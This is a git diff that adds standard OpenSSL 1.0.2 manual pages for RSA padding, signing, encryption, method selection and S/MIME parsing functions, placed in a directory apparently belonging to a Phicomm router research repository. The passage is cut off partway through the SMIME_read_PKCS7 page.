@@ -0,0 +1,124 @@
+=pod
+
+=head1 NAME
+
+RSA_padding_add_PKCS1_type_1, RSA_padding_check_PKCS1_type_1,
+RSA_padding_add_PKCS1_type_2, RSA_padding_check_PKCS1_type_2,
+RSA_padding_add_PKCS1_OAEP, RSA_padding_check_PKCS1_OAEP,
+RSA_padding_add_SSLv23, RSA_padding_check_SSLv23,
+RSA_padding_add_none, RSA_padding_check_none - asymmetric encryption
+padding
+
+=head1 SYNOPSIS
+
+ #include <openssl/rsa.h>
+
+ int RSA_padding_add_PKCS1_type_1(unsigned char *to, int tlen,
+    unsigned char *f, int fl);
+
+ int RSA_padding_check_PKCS1_type_1(unsigned char *to, int tlen,
+    unsigned char *f, int fl, int rsa_len);
+
+ int RSA_padding_add_PKCS1_type_2(unsigned char *to, int tlen,
+    unsigned char *f, int fl);
+
+ int RSA_padding_check_PKCS1_type_2(unsigned char *to, int tlen,
+    unsigned char *f, int fl, int rsa_len);
+
+ int RSA_padding_add_PKCS1_OAEP(unsigned char *to, int tlen,
+    unsigned char *f, int fl, unsigned char *p, int pl);
+
+ int RSA_padding_check_PKCS1_OAEP(unsigned char *to, int tlen,
+    unsigned char *f, int fl, int rsa_len, unsigned char *p, int pl);
+
+ int RSA_padding_add_SSLv23(unsigned char *to, int tlen,
+    unsigned char *f, int fl);
+
+ int RSA_padding_check_SSLv23(unsigned char *to, int tlen,
+    unsigned char *f, int fl, int rsa_len);
+
+ int RSA_padding_add_none(unsigned char *to, int tlen,
+    unsigned char *f, int fl);
+
+ int RSA_padding_check_none(unsigned char *to, int tlen,
+    unsigned char *f, int fl, int rsa_len);
+
+=head1 DESCRIPTION
+
+The RSA_padding_xxx_xxx() functions are called from the RSA encrypt,
+decrypt, sign and verify functions. Normally they should not be called
+from application programs.
+
+However, they can also be called directly to implement padding for other
+asymmetric ciphers. RSA_padding_add_PKCS1_OAEP() and
+RSA_padding_check_PKCS1_OAEP() may be used in an application combined
+with B<RSA_NO_PADDING> in order to implement OAEP with an encoding
+parameter.
+
+RSA_padding_add_xxx() encodes B<fl> bytes from B<f> so as to fit into
+B<tlen> bytes and stores the result at B<to>. An error occurs if B<fl>
+does not meet the size requirements of the encoding method.
+
+The following encoding methods are implemented:
+
+=over 4
+
+=item PKCS1_type_1
+
+PKCS #1 v2.0 EMSA-PKCS1-v1_5 (PKCS #1 v1.5 block type 1); used for signatures
+
+=item PKCS1_type_2
+
+PKCS #1 v2.0 EME-PKCS1-v1_5 (PKCS #1 v1.5 block type 2)
+
+=item PKCS1_OAEP
+
+PKCS #1 v2.0 EME-OAEP
+
+=item SSLv23
+
+PKCS #1 EME-PKCS1-v1_5 with SSL-specific modification
+
+=item none
+
+simply copy the data
+
+=back
+
+The random number generator must be seeded prior to calling
+RSA_padding_add_xxx().
+
+RSA_padding_check_xxx() verifies that the B<fl> bytes at B<f> contain
+a valid encoding for a B<rsa_len> byte RSA key in the respective
+encoding method and stores the recovered data of at most B<tlen> bytes
+(for B<RSA_NO_PADDING>: of size B<tlen>)
+at B<to>.
+
+For RSA_padding_xxx_OAEP(), B<p> points to the encoding parameter
+of length B<pl>. B<p> may be B<NULL> if B<pl> is 0.
+
+=head1 RETURN VALUES
+
+The RSA_padding_add_xxx() functions return 1 on success, 0 on error.
+The RSA_padding_check_xxx() functions return the length of the
+recovered data, -1 on error. Error codes can be obtained by calling
+L<ERR_get_error(3)|ERR_get_error(3)>.
+
+=head1 SEE ALSO
+
+L<RSA_public_encrypt(3)|RSA_public_encrypt(3)>,
+L<RSA_private_decrypt(3)|RSA_private_decrypt(3)>,
+L<RSA_sign(3)|RSA_sign(3)>, L<RSA_verify(3)|RSA_verify(3)>
+
+=head1 HISTORY
+
+RSA_padding_add_PKCS1_type_1(), RSA_padding_check_PKCS1_type_1(),
+RSA_padding_add_PKCS1_type_2(), RSA_padding_check_PKCS1_type_2(),
+RSA_padding_add_SSLv23(), RSA_padding_check_SSLv23(),
+RSA_padding_add_none() and RSA_padding_check_none() appeared in
+SSLeay 0.9.0.
+
+RSA_padding_add_PKCS1_OAEP() and RSA_padding_check_PKCS1_OAEP() were
+added in OpenSSL 0.9.2b.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/RSA_print.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/RSA_print.pod
new file mode 100644
index 0000000..c971e91
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/RSA_print.pod
@@ -0,0 +1,49 @@
+=pod
+
+=head1 NAME
+
+RSA_print, RSA_print_fp,
+DSAparams_print, DSAparams_print_fp, DSA_print, DSA_print_fp,
+DHparams_print, DHparams_print_fp - print cryptographic parameters
+
+=head1 SYNOPSIS
+
+ #include <openssl/rsa.h>
+
+ int RSA_print(BIO *bp, RSA *x, int offset);
+ int RSA_print_fp(FILE *fp, RSA *x, int offset);
+
+ #include <openssl/dsa.h>
+
+ int DSAparams_print(BIO *bp, DSA *x);
+ int DSAparams_print_fp(FILE *fp, DSA *x);
+ int DSA_print(BIO *bp, DSA *x, int offset);
+ int DSA_print_fp(FILE *fp, DSA *x, int offset);
+
+ #include <openssl/dh.h>
+
+ int DHparams_print(BIO *bp, DH *x);
+ int DHparams_print_fp(FILE *fp, DH *x);
+
+=head1 DESCRIPTION
+
+A human-readable hexadecimal output of the components of the RSA
+key, DSA parameters or key or DH parameters is printed to B<bp> or B<fp>.
+
+The output lines are indented by B<offset> spaces.
+
+=head1 RETURN VALUES
+
+These functions return 1 on success, 0 on error.
+
+=head1 SEE ALSO
+
+L<dh(3)|dh(3)>, L<dsa(3)|dsa(3)>, L<rsa(3)|rsa(3)>, L<BN_bn2bin(3)|BN_bn2bin(3)>
+
+=head1 HISTORY
+
+RSA_print(), RSA_print_fp(), DSA_print(), DSA_print_fp(), DH_print(),
+DH_print_fp() are available in all versions of SSLeay and OpenSSL.
+DSAparams_print() and DSAparams_print_fp() were added in SSLeay 0.8.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/RSA_private_encrypt.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/RSA_private_encrypt.pod
new file mode 100644
index 0000000..746a80c
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/RSA_private_encrypt.pod
@@ -0,0 +1,70 @@
+=pod
+
+=head1 NAME
+
+RSA_private_encrypt, RSA_public_decrypt - low level signature operations
+
+=head1 SYNOPSIS
+
+ #include <openssl/rsa.h>
+
+ int RSA_private_encrypt(int flen, unsigned char *from,
+    unsigned char *to, RSA *rsa, int padding);
+
+ int RSA_public_decrypt(int flen, unsigned char *from, 
+    unsigned char *to, RSA *rsa, int padding);
+
+=head1 DESCRIPTION
+
+These functions handle RSA signatures at a low level.
+
+RSA_private_encrypt() signs the B<flen> bytes at B<from> (usually a
+message digest with an algorithm identifier) using the private key
+B<rsa> and stores the signature in B<to>. B<to> must point to
+B<RSA_size(rsa)> bytes of memory.
+
+B<padding> denotes one of the following modes:
+
+=over 4
+
+=item RSA_PKCS1_PADDING
+
+PKCS #1 v1.5 padding. This function does not handle the
+B<algorithmIdentifier> specified in PKCS #1. When generating or
+verifying PKCS #1 signatures, L<RSA_sign(3)|RSA_sign(3)> and L<RSA_verify(3)|RSA_verify(3)> should be
+used.
+
+=item RSA_NO_PADDING
+
+Raw RSA signature. This mode should I<only> be used to implement
+cryptographically sound padding modes in the application code.
+Signing user data directly with RSA is insecure.
+
+=back
+
+RSA_public_decrypt() recovers the message digest from the B<flen>
+bytes long signature at B<from> using the signer's public key
+B<rsa>. B<to> must point to a memory section large enough to hold the
+message digest (which is smaller than B<RSA_size(rsa) -
+11>). B<padding> is the padding mode that was used to sign the data.
+
+=head1 RETURN VALUES
+
+RSA_private_encrypt() returns the size of the signature (i.e.,
+RSA_size(rsa)). RSA_public_decrypt() returns the size of the
+recovered message digest.
+
+On error, -1 is returned; the error codes can be
+obtained by L<ERR_get_error(3)|ERR_get_error(3)>.
+
+=head1 SEE ALSO
+
+L<ERR_get_error(3)|ERR_get_error(3)>, L<rsa(3)|rsa(3)>,
+L<RSA_sign(3)|RSA_sign(3)>, L<RSA_verify(3)|RSA_verify(3)>
+
+=head1 HISTORY
+
+The B<padding> argument was added in SSLeay 0.8. RSA_NO_PADDING is
+available since SSLeay 0.9.0.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/RSA_public_encrypt.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/RSA_public_encrypt.pod
new file mode 100644
index 0000000..ab0fe3b
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/RSA_public_encrypt.pod
@@ -0,0 +1,84 @@
+=pod
+
+=head1 NAME
+
+RSA_public_encrypt, RSA_private_decrypt - RSA public key cryptography
+
+=head1 SYNOPSIS
+
+ #include <openssl/rsa.h>
+
+ int RSA_public_encrypt(int flen, unsigned char *from,
+    unsigned char *to, RSA *rsa, int padding);
+
+ int RSA_private_decrypt(int flen, unsigned char *from,
+     unsigned char *to, RSA *rsa, int padding);
+
+=head1 DESCRIPTION
+
+RSA_public_encrypt() encrypts the B<flen> bytes at B<from> (usually a
+session key) using the public key B<rsa> and stores the ciphertext in
+B<to>. B<to> must point to RSA_size(B<rsa>) bytes of memory.
+
+B<padding> denotes one of the following modes:
+
+=over 4
+
+=item RSA_PKCS1_PADDING
+
+PKCS #1 v1.5 padding. This currently is the most widely used mode.
+
+=item RSA_PKCS1_OAEP_PADDING
+
+EME-OAEP as defined in PKCS #1 v2.0 with SHA-1, MGF1 and an empty
+encoding parameter. This mode is recommended for all new applications.
+
+=item RSA_SSLV23_PADDING
+
+PKCS #1 v1.5 padding with an SSL-specific modification that denotes
+that the server is SSL3 capable.
+
+=item RSA_NO_PADDING
+
+Raw RSA encryption. This mode should I<only> be used to implement
+cryptographically sound padding modes in the application code.
+Encrypting user data directly with RSA is insecure.
+
+=back
+
+B<flen> must be less than RSA_size(B<rsa>) - 11 for the PKCS #1 v1.5
+based padding modes, less than RSA_size(B<rsa>) - 41 for
+RSA_PKCS1_OAEP_PADDING and exactly RSA_size(B<rsa>) for RSA_NO_PADDING.
+The random number generator must be seeded prior to calling
+RSA_public_encrypt().
+
+RSA_private_decrypt() decrypts the B<flen> bytes at B<from> using the
+private key B<rsa> and stores the plaintext in B<to>. B<to> must point
+to a memory section large enough to hold the decrypted data (which is
+smaller than RSA_size(B<rsa>)). B<padding> is the padding mode that
+was used to encrypt the data.
+
+=head1 RETURN VALUES
+
+RSA_public_encrypt() returns the size of the encrypted data (i.e.,
+RSA_size(B<rsa>)). RSA_private_decrypt() returns the size of the
+recovered plaintext.
+
+On error, -1 is returned; the error codes can be
+obtained by L<ERR_get_error(3)|ERR_get_error(3)>.
+
+=head1 CONFORMING TO
+
+SSL, PKCS #1 v2.0
+
+=head1 SEE ALSO
+
+L<ERR_get_error(3)|ERR_get_error(3)>, L<rand(3)|rand(3)>, L<rsa(3)|rsa(3)>,
+L<RSA_size(3)|RSA_size(3)>
+
+=head1 HISTORY
+
+The B<padding> argument was added in SSLeay 0.8. RSA_NO_PADDING is
+available since SSLeay 0.9.0, OAEP was added in OpenSSL 0.9.2b.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/RSA_set_method.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/RSA_set_method.pod
new file mode 100644
index 0000000..0ef0781
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/RSA_set_method.pod
@@ -0,0 +1,206 @@
+=pod
+
+=head1 NAME
+
+RSA_set_default_method, RSA_get_default_method, RSA_set_method,
+RSA_get_method, RSA_PKCS1_SSLeay, RSA_null_method, RSA_flags,
+RSA_new_method - select RSA method
+
+=head1 SYNOPSIS
+
+ #include <openssl/rsa.h>
+
+ void RSA_set_default_method(const RSA_METHOD *meth);
+
+ RSA_METHOD *RSA_get_default_method(void);
+
+ int RSA_set_method(RSA *rsa, const RSA_METHOD *meth);
+
+ RSA_METHOD *RSA_get_method(const RSA *rsa);
+
+ RSA_METHOD *RSA_PKCS1_SSLeay(void);
+
+ RSA_METHOD *RSA_null_method(void);
+
+ int RSA_flags(const RSA *rsa);
+
+ RSA *RSA_new_method(RSA_METHOD *method);
+
+=head1 DESCRIPTION
+
+An B<RSA_METHOD> specifies the functions that OpenSSL uses for RSA
+operations. By modifying the method, alternative implementations such as
+hardware accelerators may be used. IMPORTANT: See the NOTES section for
+important information about how these RSA API functions are affected by the
+use of B<ENGINE> API calls.
+
+Initially, the default RSA_METHOD is the OpenSSL internal implementation,
+as returned by RSA_PKCS1_SSLeay().
+
+RSA_set_default_method() makes B<meth> the default method for all RSA
+structures created later. B<NB>: This is true only whilst no ENGINE has
+been set as a default for RSA, so this function is no longer recommended.
+
+RSA_get_default_method() returns a pointer to the current default
+RSA_METHOD. However, the meaningfulness of this result is dependent on
+whether the ENGINE API is being used, so this function is no longer 
+recommended.
+
+RSA_set_method() selects B<meth> to perform all operations using the key
+B<rsa>. This will replace the RSA_METHOD used by the RSA key and if the
+previous method was supplied by an ENGINE, the handle to that ENGINE will
+be released during the change. It is possible to have RSA keys that only
+work with certain RSA_METHOD implementations (eg. from an ENGINE module
+that supports embedded hardware-protected keys), and in such cases
+attempting to change the RSA_METHOD for the key can have unexpected
+results.
+
+RSA_get_method() returns a pointer to the RSA_METHOD being used by B<rsa>.
+This method may or may not be supplied by an ENGINE implementation, but if
+it is, the return value can only be guaranteed to be valid as long as the
+RSA key itself is valid and does not have its implementation changed by
+RSA_set_method().
+
+RSA_flags() returns the B<flags> that are set for B<rsa>'s current
+RSA_METHOD. See the BUGS section.
+
+RSA_new_method() allocates and initializes an RSA structure so that
+B<engine> will be used for the RSA operations. If B<engine> is NULL, the
+default ENGINE for RSA operations is used, and if no default ENGINE is set,
+the RSA_METHOD controlled by RSA_set_default_method() is used.
+
+RSA_flags() returns the B<flags> that are set for B<rsa>'s current method.
+
+RSA_new_method() allocates and initializes an B<RSA> structure so that
+B<method> will be used for the RSA operations. If B<method> is B<NULL>,
+the default method is used.
+
+=head1 THE RSA_METHOD STRUCTURE
+
+ typedef struct rsa_meth_st
+ {
+     /* name of the implementation */
+	const char *name;
+
+     /* encrypt */
+	int (*rsa_pub_enc)(int flen, unsigned char *from,
+          unsigned char *to, RSA *rsa, int padding);
+
+     /* verify arbitrary data */
+	int (*rsa_pub_dec)(int flen, unsigned char *from,
+          unsigned char *to, RSA *rsa, int padding);
+
+     /* sign arbitrary data */
+	int (*rsa_priv_enc)(int flen, unsigned char *from,
+          unsigned char *to, RSA *rsa, int padding);
+
+     /* decrypt */
+	int (*rsa_priv_dec)(int flen, unsigned char *from,
+          unsigned char *to, RSA *rsa, int padding);
+
+     /* compute r0 = r0 ^ I mod rsa->n (May be NULL for some
+                                        implementations) */
+	int (*rsa_mod_exp)(BIGNUM *r0, BIGNUM *I, RSA *rsa);
+
+     /* compute r = a ^ p mod m (May be NULL for some implementations) */
+	int (*bn_mod_exp)(BIGNUM *r, BIGNUM *a, const BIGNUM *p,
+          const BIGNUM *m, BN_CTX *ctx, BN_MONT_CTX *m_ctx);
+
+     /* called at RSA_new */
+	int (*init)(RSA *rsa);
+
+     /* called at RSA_free */
+	int (*finish)(RSA *rsa);
+
+     /* RSA_FLAG_EXT_PKEY        - rsa_mod_exp is called for private key
+      *                            operations, even if p,q,dmp1,dmq1,iqmp
+      *                            are NULL
+      * RSA_FLAG_SIGN_VER        - enable rsa_sign and rsa_verify
+      * RSA_METHOD_FLAG_NO_CHECK - don't check pub/private match
+      */
+	int flags;
+
+	char *app_data; /* ?? */
+
+     /* sign. For backward compatibility, this is used only
+      * if (flags & RSA_FLAG_SIGN_VER)
+      */
+	int (*rsa_sign)(int type,
+		const unsigned char *m, unsigned int m_length,
+		unsigned char *sigret, unsigned int *siglen, const RSA *rsa);
+     /* verify. For backward compatibility, this is used only
+      * if (flags & RSA_FLAG_SIGN_VER)
+      */
+	int (*rsa_verify)(int dtype,
+		const unsigned char *m, unsigned int m_length,
+		const unsigned char *sigbuf, unsigned int siglen,
+								const RSA *rsa);
+     /* keygen. If NULL builtin RSA key generation will be used */
+	int (*rsa_keygen)(RSA *rsa, int bits, BIGNUM *e, BN_GENCB *cb);
+
+ } RSA_METHOD;
+
+=head1 RETURN VALUES
+
+RSA_PKCS1_SSLeay(), RSA_PKCS1_null_method(), RSA_get_default_method()
+and RSA_get_method() return pointers to the respective RSA_METHODs.
+
+RSA_set_default_method() returns no value.
+
+RSA_set_method() returns a pointer to the old RSA_METHOD implementation
+that was replaced. However, this return value should probably be ignored
+because if it was supplied by an ENGINE, the pointer could be invalidated
+at any time if the ENGINE is unloaded (in fact it could be unloaded as a
+result of the RSA_set_method() function releasing its handle to the
+ENGINE). For this reason, the return type may be replaced with a B<void>
+declaration in a future release.
+
+RSA_new_method() returns NULL and sets an error code that can be obtained
+by L<ERR_get_error(3)|ERR_get_error(3)> if the allocation fails. Otherwise
+it returns a pointer to the newly allocated structure.
+
+=head1 NOTES
+
+As of version 0.9.7, RSA_METHOD implementations are grouped together with
+other algorithmic APIs (eg. DSA_METHOD, EVP_CIPHER, etc) into B<ENGINE>
+modules. If a default ENGINE is specified for RSA functionality using an
+ENGINE API function, that will override any RSA defaults set using the RSA
+API (ie.  RSA_set_default_method()). For this reason, the ENGINE API is the
+recommended way to control default implementations for use in RSA and other
+cryptographic algorithms.
+
+=head1 BUGS
+
+The behaviour of RSA_flags() is a mis-feature that is left as-is for now
+to avoid creating compatibility problems. RSA functionality, such as the
+encryption functions, are controlled by the B<flags> value in the RSA key
+itself, not by the B<flags> value in the RSA_METHOD attached to the RSA key
+(which is what this function returns). If the flags element of an RSA key
+is changed, the changes will be honoured by RSA functionality but will not
+be reflected in the return value of the RSA_flags() function - in effect
+RSA_flags() behaves more like an RSA_default_flags() function (which does
+not currently exist).
+
+=head1 SEE ALSO
+
+L<rsa(3)|rsa(3)>, L<RSA_new(3)|RSA_new(3)>
+
+=head1 HISTORY
+
+RSA_new_method() and RSA_set_default_method() appeared in SSLeay 0.8.
+RSA_get_default_method(), RSA_set_method() and RSA_get_method() as
+well as the rsa_sign and rsa_verify components of RSA_METHOD were
+added in OpenSSL 0.9.4.
+
+RSA_set_default_openssl_method() and RSA_get_default_openssl_method()
+replaced RSA_set_default_method() and RSA_get_default_method()
+respectively, and RSA_set_method() and RSA_new_method() were altered to use
+B<ENGINE>s rather than B<RSA_METHOD>s during development of the engine
+version of OpenSSL 0.9.6. For 0.9.7, the handling of defaults in the ENGINE
+API was restructured so that this change was reversed, and behaviour of the
+other functions resembled more closely the previous behaviour. The
+behaviour of defaults in the ENGINE API now transparently overrides the
+behaviour of defaults in the RSA API without requiring changing these
+function prototypes.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/RSA_sign.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/RSA_sign.pod
new file mode 100644
index 0000000..fc16b1f
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/RSA_sign.pod
@@ -0,0 +1,66 @@
+=pod
+
+=head1 NAME
+
+RSA_sign, RSA_verify - RSA signatures
+
+=head1 SYNOPSIS
+
+ #include <openssl/rsa.h>
+
+ int RSA_sign(int type, const unsigned char *m, unsigned int m_len,
+    unsigned char *sigret, unsigned int *siglen, RSA *rsa);
+
+ int RSA_verify(int type, const unsigned char *m, unsigned int m_len,
+    unsigned char *sigbuf, unsigned int siglen, RSA *rsa);
+
+=head1 DESCRIPTION
+
+RSA_sign() signs the message digest B<m> of size B<m_len> using the
+private key B<rsa> as specified in PKCS #1 v2.0. It stores the
+signature in B<sigret> and the signature size in B<siglen>. B<sigret>
+must point to RSA_size(B<rsa>) bytes of memory.
+Note that PKCS #1 adds meta-data, placing limits on the size of the
+key that can be used.
+See L<RSA_private_encrypt(3)|RSA_private_encrypt(3)> for lower-level
+operations.
+
+B<type> denotes the message digest algorithm that was used to generate
+B<m>. It usually is one of B<NID_sha1>, B<NID_ripemd160> and B<NID_md5>;
+see L<objects(3)|objects(3)> for details. If B<type> is B<NID_md5_sha1>,
+an SSL signature (MD5 and SHA1 message digests with PKCS #1 padding
+and no algorithm identifier) is created.
+
+RSA_verify() verifies that the signature B<sigbuf> of size B<siglen>
+matches a given message digest B<m> of size B<m_len>. B<type> denotes
+the message digest algorithm that was used to generate the signature.
+B<rsa> is the signer's public key.
+
+=head1 RETURN VALUES
+
+RSA_sign() returns 1 on success, 0 otherwise.  RSA_verify() returns 1
+on successful verification, 0 otherwise.
+
+The error codes can be obtained by L<ERR_get_error(3)|ERR_get_error(3)>.
+
+=head1 BUGS
+
+Certain signatures with an improper algorithm identifier are accepted
+for compatibility with SSLeay 0.4.5 :-)
+
+=head1 CONFORMING TO
+
+SSL, PKCS #1 v2.0
+
+=head1 SEE ALSO
+
+L<ERR_get_error(3)|ERR_get_error(3)>, L<objects(3)|objects(3)>,
+L<rsa(3)|rsa(3)>, L<RSA_private_encrypt(3)|RSA_private_encrypt(3)>,
+L<RSA_public_decrypt(3)|RSA_public_decrypt(3)> 
+
+=head1 HISTORY
+
+RSA_sign() and RSA_verify() are available in all versions of SSLeay
+and OpenSSL.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/RSA_sign_ASN1_OCTET_STRING.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/RSA_sign_ASN1_OCTET_STRING.pod
new file mode 100644
index 0000000..e70380b
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/RSA_sign_ASN1_OCTET_STRING.pod
@@ -0,0 +1,59 @@
+=pod
+
+=head1 NAME
+
+RSA_sign_ASN1_OCTET_STRING, RSA_verify_ASN1_OCTET_STRING - RSA signatures
+
+=head1 SYNOPSIS
+
+ #include <openssl/rsa.h>
+
+ int RSA_sign_ASN1_OCTET_STRING(int dummy, unsigned char *m,
+    unsigned int m_len, unsigned char *sigret, unsigned int *siglen,
+    RSA *rsa);
+
+ int RSA_verify_ASN1_OCTET_STRING(int dummy, unsigned char *m,
+    unsigned int m_len, unsigned char *sigbuf, unsigned int siglen,
+    RSA *rsa);
+
+=head1 DESCRIPTION
+
+RSA_sign_ASN1_OCTET_STRING() signs the octet string B<m> of size
+B<m_len> using the private key B<rsa> represented in DER using PKCS #1
+padding. It stores the signature in B<sigret> and the signature size
+in B<siglen>. B<sigret> must point to B<RSA_size(rsa)> bytes of
+memory.
+
+B<dummy> is ignored.
+
+The random number generator must be seeded prior to calling RSA_sign_ASN1_OCTET_STRING().
+
+RSA_verify_ASN1_OCTET_STRING() verifies that the signature B<sigbuf>
+of size B<siglen> is the DER representation of a given octet string
+B<m> of size B<m_len>. B<dummy> is ignored. B<rsa> is the signer's
+public key.
+
+=head1 RETURN VALUES
+
+RSA_sign_ASN1_OCTET_STRING() returns 1 on success, 0 otherwise.
+RSA_verify_ASN1_OCTET_STRING() returns 1 on successful verification, 0
+otherwise.
+
+The error codes can be obtained by L<ERR_get_error(3)|ERR_get_error(3)>.
+
+=head1 BUGS
+
+These functions serve no recognizable purpose.
+
+=head1 SEE ALSO
+
+L<ERR_get_error(3)|ERR_get_error(3)>, L<objects(3)|objects(3)>,
+L<rand(3)|rand(3)>, L<rsa(3)|rsa(3)>, L<RSA_sign(3)|RSA_sign(3)>,
+L<RSA_verify(3)|RSA_verify(3)>
+
+=head1 HISTORY
+
+RSA_sign_ASN1_OCTET_STRING() and RSA_verify_ASN1_OCTET_STRING() were
+added in SSLeay 0.8.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/RSA_size.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/RSA_size.pod
new file mode 100644
index 0000000..5b7f835
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/RSA_size.pod
@@ -0,0 +1,33 @@
+=pod
+
+=head1 NAME
+
+RSA_size - get RSA modulus size
+
+=head1 SYNOPSIS
+
+ #include <openssl/rsa.h>
+
+ int RSA_size(const RSA *rsa);
+
+=head1 DESCRIPTION
+
+This function returns the RSA modulus size in bytes. It can be used to
+determine how much memory must be allocated for an RSA encrypted
+value.
+
+B<rsa-E<gt>n> must not be B<NULL>.
+
+=head1 RETURN VALUE
+
+The size in bytes.
+
+=head1 SEE ALSO
+
+L<rsa(3)|rsa(3)>
+
+=head1 HISTORY
+
+RSA_size() is available in all versions of SSLeay and OpenSSL.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/SMIME_read_CMS.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/SMIME_read_CMS.pod
new file mode 100644
index 0000000..acc5524
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/SMIME_read_CMS.pod
@@ -0,0 +1,70 @@
+=pod
+
+=head1 NAME
+
+ SMIME_read_CMS - parse S/MIME message.
+
+=head1 SYNOPSIS
+
+ #include <openssl/cms.h>
+
+ CMS_ContentInfo *SMIME_read_CMS(BIO *in, BIO **bcont);
+
+=head1 DESCRIPTION
+
+SMIME_read_CMS() parses a message in S/MIME format.
+
+B<in> is a BIO to read the message from.
+
+If cleartext signing is used then the content is saved in a memory bio which is
+written to B<*bcont>, otherwise B<*bcont> is set to NULL.
+
+The parsed CMS_ContentInfo structure is returned or NULL if an
+error occurred.
+
+=head1 NOTES
+
+If B<*bcont> is not NULL then the message is clear text signed. B<*bcont> can
+then be passed to CMS_verify() with the B<CMS_DETACHED> flag set.
+
+Otherwise the type of the returned structure can be determined
+using CMS_get0_type().
+
+To support future functionality if B<bcont> is not NULL B<*bcont> should be
+initialized to NULL. For example:
+
+ BIO *cont = NULL;
+ CMS_ContentInfo *cms;
+
+ cms = SMIME_read_CMS(in, &cont);
+
+=head1 BUGS
+
+The MIME parser used by SMIME_read_CMS() is somewhat primitive.  While it will
+handle most S/MIME messages more complex compound formats may not work.
+
+The parser assumes that the CMS_ContentInfo structure is always base64 encoded
+and will not handle the case where it is in binary format or uses quoted
+printable format.
+
+The use of a memory BIO to hold the signed content limits the size of message
+which can be processed due to memory restraints: a streaming single pass option
+should be available.
+
+=head1 RETURN VALUES
+
+SMIME_read_CMS() returns a valid B<CMS_ContentInfo> structure or B<NULL>
+if an error occurred. The error can be obtained from ERR_get_error(3).
+
+=head1 SEE ALSO
+
+L<ERR_get_error(3)|ERR_get_error(3)>, L<CMS_type(3)|CMS_type(3)>
+L<SMIME_read_CMS(3)|SMIME_read_CMS(3)>, L<CMS_sign(3)|CMS_sign(3)>,
+L<CMS_verify(3)|CMS_verify(3)>, L<CMS_encrypt(3)|CMS_encrypt(3)>
+L<CMS_decrypt(3)|CMS_decrypt(3)>
+
+=head1 HISTORY
+
+SMIME_read_CMS() was added to OpenSSL 0.9.8
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/SMIME_read_PKCS7.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/SMIME_read_PKCS7.pod
new file mode 100644
index 0000000..9d46715
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/SMIME_read_PKCS7.pod
@@ -0,0 +1,73 @@
+=pod
+
+=head1 NAME
+
+SMIME_read_PKCS7 - parse S/MIME message.
+
+=head1 SYNOPSIS
+
+ #include <openssl/pkcs7.h>
+
+ PKCS7 *SMIME_read_PKCS7(BIO *in, BIO **bcont);
+
+=head1 DESCRIPTION
+
+SMIME_read_PKCS7() parses a message in S/MIME format.
+
+B<in> is a BIO to read the message from.
+
+If cleartext signing is used then the content is saved in
+a memory bio which is written to B<*bcont>, otherwise
+B<*bcont> is set to B<NULL>.
+
+The parsed PKCS#7 structure is returned or B<NULL> if an
+error occurred.
+
+=head1 NOTES
+
+If B<*bcont> is not B<NULL> then the message is clear text
+signed. B<*bcont> can then be passed to PKCS7_verify() with
+the B<PKCS7_DETACHED> flag set.
+
+Otherwise the type of the returned structure can be determined
+using PKCS7_type().
+
+To support future functionality if B<bcont> is not B<NULL>
+B<*bcont> should be initialized to B<NULL>. For example:
+
+ BIO *cont = NULL;
+ PKCS7 *p7;
+
+ p7 = SMIME_read_PKCS7(in, &cont);
+
+=head1 BUGS
+
+The MIME parser used by SMIME_read_PKCS7() is somewhat primitive.
+While it will handle most S/MIME messages more complex compound
+formats may not work.
+
+The parser assumes that the PKCS7 structure is always base64
+encoded and will not handle the case where it is in binary format
+or uses quoted printable format.
+
+The use of a memory BIO to hold the signed content limits the size
+of message which can be processed due to memory restraints: a
+streaming single pass option should be available.
+
+=head1 RETURN VALUES
+
+SMIME_read_PKCS7() returns a valid B<PKCS7> structure or B<NULL>
+is an error occurred. The error can be obtained from ERR_get_error(3).
+
+=head1 SEE ALSO
+
+L<ERR_get_error(3)|ERR_get_error(3)>, L<PKCS7_type(3)|PKCS7_type(3)>
